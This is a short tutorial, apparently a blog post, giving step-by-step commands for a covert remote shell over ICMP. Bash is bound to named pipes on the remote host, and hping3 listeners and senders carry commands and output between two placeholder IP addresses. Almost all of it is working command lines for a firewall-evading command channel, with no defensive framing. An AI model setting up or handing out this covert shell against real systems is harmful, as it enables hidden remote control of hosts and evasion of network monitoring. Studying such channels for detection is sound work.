There may be a tighter way to accomplish this, but these are the basic steps for setting up a remote shell over ICMP.
First, on the remote system we setup some named pipes, and attach them to the
STDOUT (we also direct
STDIN) of a shell:
mknod /tmp/in p # depending on your system you may have to use mkfifo mknod /tmp/out p bash </tmp/in >/tmp/out 2>&1
Next step, direct
STDOUT of a listening
hping to the "in" pipe on the remote system, followed by an outgoing
hping reading from the "out" pipe.
hping3 [LOCAL_BOX_IP] --listen MSGIDIN -I eth0 --icmp > /tmp/in & hping3 [LOCAL_BOX_IP] --sign MSGIDOUT -I eth0 --icmp -d 1200 --file /tmp/out &
Now we move to the local system, setting up a listening
hping to receive the output from the remote box. Followed by making another named pipe for an outgoing
hping to read, which we'll use to send commands to the remote system:
hping3 [REMOTE_BOX_IP] --listen MSGIDOUT -I eth0 --icmp & mknod /tmp/out p hping3 [REMOTE_BOX_IP] --sign MSGIDIN -I eth0 --icmp -d 1200 --file /tmp/out &
Now all you have to do is send command to the named type on the local system, don't worry about the lack of prompt:
cat > /tmp/out hostname remote.example.com
Tada! It's a little messy, you might end up with some duplicated output — but it works.